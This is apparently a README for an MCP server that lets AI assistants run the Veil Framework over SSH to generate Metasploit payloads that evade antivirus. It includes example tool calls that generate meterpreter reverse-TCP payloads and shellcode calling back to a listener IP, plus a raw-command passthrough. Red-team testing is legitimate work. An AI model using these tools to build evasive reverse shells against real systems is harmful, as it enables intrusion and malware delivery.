A Model Context Protocol (MCP) server for interacting with the Veil Framework - a tool designed to generate Metasploit payloads that bypass common anti-virus solutions.
This MCP server enables AI assistants to interact with Veil for security testing purposes, providing tools for:
- Listing available payload types and tools
- Generating AV-evading payloads
- Creating custom shellcode
- Managing generated artifacts
- Checking payload hashes against VirusTotal (hash-only, no upload)
- Node.js 18 or higher
- SSH access to a Kali Linux host with Veil 3.x installed
- SSH key-based authentication configured for the Kali host
# Clone the repository
git clone https://github.com/schwarztim/sec-veil-evasion-mcp.git
cd sec-veil-evasion-mcp
# Install dependencies
npm install
# Build the TypeScript source
npm run build| Variable | Description | Default |
|---|---|---|
VEIL_KALI_HOST |
SSH hostname for Kali Linux | kali |
VEIL_PATH |
Path to Veil.py on Kali | /usr/share/veil/Veil.py |
Add to your Claude Desktop configuration (~/.config/claude/claude_desktop_config.json on Linux or ~/Library/Application Support/Claude/claude_desktop_config.json on macOS):
{
"mcpServers": {
"veil-evasion": {
"command": "node",
"args": ["/path/to/sec-veil-evasion-mcp/dist/index.js"],
"env": {
"VEIL_KALI_HOST": "your-kali-hostname",
"VEIL_PATH": "/usr/share/veil/Veil.py"
}
}
}
}List available Veil tools (Evasion, Ordnance).
List all available payloads for a specific tool.
tool(required):"Evasion"or"Ordnance"
Get detailed information about a specific payload.
tool(required):"Evasion"or"Ordnance"payload(required): Payload name or number
Generate a payload with specified options.
tool(required):"Evasion"or"Ordnance"payload(required): Payload name or numberlhost(required): Callback IP addresslport: Callback port (default:4444)output_name: Base name for output filesshellcode_method:"msfvenom"or"ordnance"msfvenom_payload: MSFVenom payload stringcustom_options: Additional payload options
Generate shellcode only using Veil-Ordnance.
payload(required): Ordnance payload typelhost(required): Callback IPlport: Callback port (default:4444)encoder: Encoder to useiterations: Encoding iterations
Check payload hash against VirusTotal (hash only, no upload).
file_path(required): Path to payload file on Kali
Clean up generated payloads and artifacts.
clean_all: If true, cleans all files (default:true)
List all previously generated payloads.
Get Veil framework version information.
Update the Veil framework.
Execute raw Veil commands for advanced usage.
args(required): Command line arguments
veil_list_payloads { "tool": "Evasion" }
veil_generate {
"tool": "Evasion",
"payload": "go/meterpreter/rev_tcp",
"lhost": "192.168.1.100",
"lport": 4444,
"output_name": "test_payload"
}
veil_generate_shellcode {
"payload": "rev_tcp",
"lhost": "192.168.1.100",
"lport": 443
}
┌─────────────────┐ SSH ┌─────────────────┐
│ Claude/MCP │──────────────│ Kali Linux │
│ Client │ │ + Veil 3.x │
└─────────────────┘ └─────────────────┘
│
▼
┌─────────────────┐
│ veil-evasion │
│ MCP Server │
└─────────────────┘
The server executes Veil commands via SSH on a remote Kali Linux host, allowing secure payload generation from any system with SSH access.
This tool is designed for authorized penetration testing and security research only.
- Always obtain proper written authorization before testing systems you do not own
- Never use generated payloads against systems without explicit permission
- Follow all applicable laws and regulations in your jurisdiction
- The authors are not responsible for misuse of this tool
# Watch mode for development
npm run dev
# Build the project
npm run build
# Run the server
npm startMIT License - see LICENSE for details.
- Veil Framework - The underlying payload generation framework
- Model Context Protocol - The protocol specification
- MCP TypeScript SDK - The SDK used to build this server
Contributions are welcome! Please feel free to submit a Pull Request.
- Fork the repository
- Create your feature branch (
git checkout -b feature/amazing-feature) - Commit your changes (
git commit -m 'Add some amazing feature') - Push to the branch (
git push origin feature/amazing-feature) - Open a Pull Request